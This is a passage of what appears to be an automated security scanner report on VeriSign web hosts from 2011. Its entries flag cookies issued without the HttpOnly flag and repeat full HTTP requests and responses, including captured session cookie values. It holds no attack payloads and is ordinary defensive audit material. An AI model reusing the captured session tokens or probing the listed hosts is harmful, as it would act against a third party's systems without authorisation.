GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 57905 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi...[SNIP]...
10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 22968 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4605 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 19769 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 8013 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: ApacheSet-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT ETag: "2e58332-255-49a38c2aff480" Accept-Ranges: bytes Content-Length: 597 X-UA-Compatible: IE=EmulateIE7 Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.co.uk
Path:
/hp07/i/vlogo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
